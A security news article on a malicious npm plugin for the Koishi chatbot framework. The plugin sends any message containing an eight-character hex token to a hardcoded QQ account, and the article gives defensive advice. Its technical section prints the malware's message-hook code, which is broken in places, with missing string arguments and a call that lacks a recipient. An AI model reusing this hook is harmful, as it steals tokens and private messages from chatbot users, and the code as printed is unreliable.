Cybersecurity researchers have recently identified a sophisticated supply chain attack targeting users of the Koishi chatbot framework. The attack involves a malicious npm package named koishi-plugin-pinhaofa, which, while appearing legitimate, contains hidden code designed to exfiltrate sensitive data from messages processed by the chatbot.
Discovery and Mechanism of the Malicious Package
The malicious package was uncovered during routine security scans by researchers at Socket.dev. Their AI Scanner system flagged koishi-plugin-pinhaofa as Known malware, prompting a deeper investigation. The package integrates seamlessly into the Koishi framework, allowing it to monitor all messages handled by the chatbot.
The embedded malware specifically searches for eight-character hexadecimal strings within messages. These strings often represent sensitive information such as Git commit hashes, truncated JSON Web Tokens (JWTs), or API tokens. Upon detecting such a pattern, the malware immediately forwards the entire message content to a hardcoded QQ account, potentially exposing user credentials and confidential data.
Understanding Koishi and Its Vulnerability
Koishi is a TypeScript framework designed for developing cross-platform chatbots capable of operating on multiple messaging services, including QQ, Telegram, and Discord, from a single codebase. With over a thousand community plugins available in its marketplace, Koishi has become a popular choice for businesses seeking to enhance customer engagement through chatbots.
The framework’s versatility and extensive plugin ecosystem, however, also introduce security risks. Plugins in Koishi execute directly within the bot’s trusted environment. This means that installing a plugin without thorough code review can grant malicious code unrestricted access to read and modify every message processed by the system.
Implications Across Industries
The targeted nature of this attack is particularly concerning due to its potential impact across various industries:
– Banking: Chatbots used in banking could inadvertently disclose payment card numbers or other financial information.
– E-commerce: Customer service bots might leak order-status links containing authentication tokens, compromising user accounts.
– Healthcare: Medical chatbots could expose patient information, violating privacy regulations and eroding trust.
The malware’s focus on eight-character hex strings is a strategic choice, as it minimizes false positives while maximizing the collection of high-value data.
Technical Analysis of the Malware
The attack’s simplicity is notable. Instead of employing complex obfuscation techniques, the malware operates through a few lines of straightforward JavaScript code that hooks into Koishi’s message handling system:
“`javascript
ctx.on(message, (session) => { // process every incoming message
const hexRegex = /(^|[^0-9A-Fa-f])([0-9A-Fa-f]{8})([^0-9A-Fa-f]|$)/;
const content = session.content.replace( , );
if (hexRegex.test(content)) { // true if an exact 8-char hex string exists…
session.bot.sendPrivateMessage( // exfiltrate complete message text
1821181277, // threat actor’s QQ UIN
content);
session.bot.sendPrivateMessage(
extractAll8DigitHex(content)[0]);
}
});
“`
This code listens for incoming messages, checks for the presence of an eight-character hexadecimal string, and if found, sends the message content to the attacker’s QQ account.
The exfiltration method is particularly effective at evading detection because it utilizes the same communication channels that legitimate chatbot traffic would use. Since the stolen data exits via the chat protocol the bot normally employs, standard web filters and endpoint defenses may not differentiate between legitimate and malicious communications.
Threat Actor Profile
The malicious package was published by an individual using the npm alias kuminfennel, with a registration email matching the hardcoded QQ account ([email protected]). This alignment suggests a deliberate and targeted effort to infiltrate the Koishi plugin ecosystem.
Broader Context of Supply Chain Attacks
This incident is part of a growing trend of supply chain attacks targeting open-source ecosystems. Malicious actors increasingly exploit the trust within these communities to distribute malware. For instance, in previous cases, attackers have uploaded malicious packages to npm that deploy reverse shells on developer systems, steal credentials, or exfiltrate sensitive data.
The open nature of platforms like npm allows for rapid innovation and collaboration but also presents significant security challenges. The ease of publishing packages makes it simple for attackers to distribute malware, emphasizing the need for vigilant security practices among developers.
Recommendations for Developers and Organizations
To mitigate the risks associated with malicious packages:
1. Conduct Thorough Code Reviews: Before integrating new plugins or packages, especially those from less-known sources, perform comprehensive code reviews to identify potential security issues.
2. Implement Automated Security Scanning: Utilize tools that can automatically scan for known vulnerabilities and malicious code within dependencies.
3. Monitor for Unusual Activity: Keep an eye on the behavior of chatbots and other applications for signs of unauthorized data transmission or other anomalies.
4. Limit Plugin Permissions: Restrict the permissions granted to plugins, ensuring they only have access to the necessary data and functions required for their operation.
5. Stay Informed: Regularly update your knowledge on emerging threats and best practices in software supply chain security.
By adopting these practices, developers and organizations can better protect themselves against the evolving landscape of supply chain attacks targeting open-source ecosystems.
